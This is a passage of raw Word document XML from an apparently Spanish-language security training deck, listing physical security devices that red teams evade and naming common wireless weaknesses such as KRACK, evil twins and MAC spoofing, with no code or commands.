          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los Red Teams están entrenados para eludir la detección de uno o más de los siguientes dispositivos de seguridad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E7499" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="279"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="671BC85A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1538"/>
        </w:tabs>
        <w:ind w:left="1538" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>CCTV (cámaras de circuito cerrado de televisión)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE21C6F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1538"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="1538" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cerraduras de entrada con teclado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10698BD8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1538"/>
        </w:tabs>
        <w:spacing w:before="44"/>
        <w:ind w:left="1538" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Intercomunicadores inalámbricos/videoporteros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2695D1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1538"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="1538" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Detección de movimiento/sensor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E3D2E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1538"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="1538" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cerrojos simples o dobles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678DE7C6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1538"/>
        </w:tabs>
        <w:spacing w:before="45"/>
        <w:ind w:left="1538" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cerraduras de puertas y ventanas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A017D82" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1538"/>
        </w:tabs>
        <w:spacing w:before="42"/>
        <w:ind w:left="1538" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Puertas de seguridad de acero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3638B141" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1538"/>
        </w:tabs>
        <w:spacing w:before="44"/>
        <w:ind w:left="1538" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Puertas de entrada remotas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4D9F7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId141"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="440" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="475A99EB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1514"/>
        </w:tabs>
        <w:spacing w:line="522" w:lineRule="exact"/>
        <w:ind w:left="1514" w:hanging="1100"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ataques inalámbricos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CFA742" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="259"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E50757B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="774"/>
        </w:tabs>
        <w:spacing w:line="189" w:lineRule="auto"/>
        <w:ind w:right="626"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El aumento masivo de los ataques cibernéticos a través de redes Wi-Fi públicas, campus Wi-Fi empresarial abierto conectado a la red interna posee una gran amenaza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7B5BD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="192"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C40D7F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="773"/>
        </w:tabs>
        <w:ind w:left="773" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15795200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7502C1CA" wp14:editId="05D149B6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>8041907</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-181207</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4069715" cy="3417570"/>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715" cy="3417570"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4069715" cy="3417570"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="319" name="Image 319"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId142" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4069561" cy="3417252"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="320" name="Image 320"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId143" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="158736" y="158718"/>
                            <a:ext cx="3572255" cy="2919984"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="5232FD03" id="Group 318" o:spid="_x0000_s1026" style="position:absolute;margin-left:633.2pt;margin-top:-14.25pt;width:320.45pt;height:269.1pt;z-index:15795200;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="40697,34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">
                <v:shape id="Image 319" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:40695;height:3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">
                  <v:imagedata r:id="rId144" o:title=""/>
                </v:shape>
                <v:shape id="Image 320" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1587;top:1587;width:35722;height:2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">
                  <v:imagedata r:id="rId145" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Vulnerabilidades inalámbricas comunes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4681F2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="85"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F425B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1493"/>
        </w:tabs>
        <w:ind w:left="1493" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Uso de SSID y contraseñas predeterminadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6556A5AE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481EEEC2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1493"/>
          <w:tab w:val="left" w:pos="1559"/>
        </w:tabs>
        <w:ind w:right="7029" w:hanging="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Degradación del protocolo de seguridad inalámbrica a WEP y a una versión anterior de WPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA6D8E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C09BBB3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1493"/>
        </w:tabs>
        <w:ind w:left="1493" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Vulnerabilidad de WPA2 Krack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C729712" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331A6D99" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1493"/>
        </w:tabs>
        <w:ind w:left="1493" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Puntos de acceso WiFi falsos, gemelos malvados y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ataques</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>intermediario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17EB5B2E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B15A9F6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1493"/>
        </w:tabs>
        <w:ind w:left="1493" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Rastreo de paquetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49260953" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53408F84" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1493"/>
        </w:tabs>
        <w:ind w:left="1493" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Suplantación de MAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECE970A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="240" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06853D8B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4096A7FB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB721A5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0292B281" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D6A035" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54CCE493" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="2733"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4905912D" wp14:editId="759F3ED1">
                <wp:extent cx="8961120" cy="3214370"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>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1120" cy="3214370"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="B34512"/>
                        </a:solidFill>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="306F6343" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="56"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="120"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="3C3FE059" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
